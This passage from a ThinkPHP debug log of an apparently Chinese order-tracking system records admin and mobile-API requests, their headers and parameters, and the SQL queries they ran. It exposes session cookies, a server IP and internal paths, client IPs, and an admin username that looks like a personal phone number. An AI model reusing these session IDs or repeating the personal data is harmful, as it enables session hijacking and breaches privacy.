productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308323>orderinfo.end_time desc,1658308323>orderinfo.end_time desc,1658308323-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002430s ] --------------------------------------------------------------- [ 2022-07-20T17:12:03+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308323 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308323 [运行时间:0.034082s][吞吐率:29.34req/s] [内存消耗:3,854.94kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308323', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001919s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000122s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020630s][吞吐率:48.47req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001196s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:05+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.054612s][吞吐率:18.31req/s] [内存消耗:4,963.06kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001232s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001655s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008211s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000483s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001686s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000679s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000460s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001514s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308325) [ RunTime:0.005314s ] --------------------------------------------------------------- [ 2022-07-20T17:12:06+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.052401s][吞吐率:19.08req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001568s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000526s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001526s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000509s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001559s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001021s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308326>orderinfo.end_time desc,1658308326>orderinfo.end_time desc,1658308326-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002265s ] --------------------------------------------------------------- [ 2022-07-20T17:12:06+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020689s][吞吐率:48.33req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001112s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:06+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.053805s][吞吐率:18.59req/s] [内存消耗:4,963.09kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001150s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001790s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008462s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000625s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001513s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000417s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000704s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001564s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308326) [ RunTime:0.005552s ] --------------------------------------------------------------- [ 2022-07-20T17:12:07+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [运行时间:0.052458s][吞吐率:19.06req/s] [内存消耗:4,769.86kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001178s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001482s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000506s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001377s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000756s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001582s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001616s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308327>orderinfo.end_time desc,1658308327>orderinfo.end_time desc,1658308327-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002460s ] --------------------------------------------------------------- [ 2022-07-20T17:12:07+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020405s][吞吐率:49.01req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001125s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:07+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021073s][吞吐率:47.45req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001233s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:08+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018827s][吞吐率:53.12req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001058s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:09+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021147s][吞吐率:47.29req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001332s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:10+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021726s][吞吐率:46.03req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001213s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:11+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020829s][吞吐率:48.01req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001204s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:11+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020110s][吞吐率:49.73req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001192s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 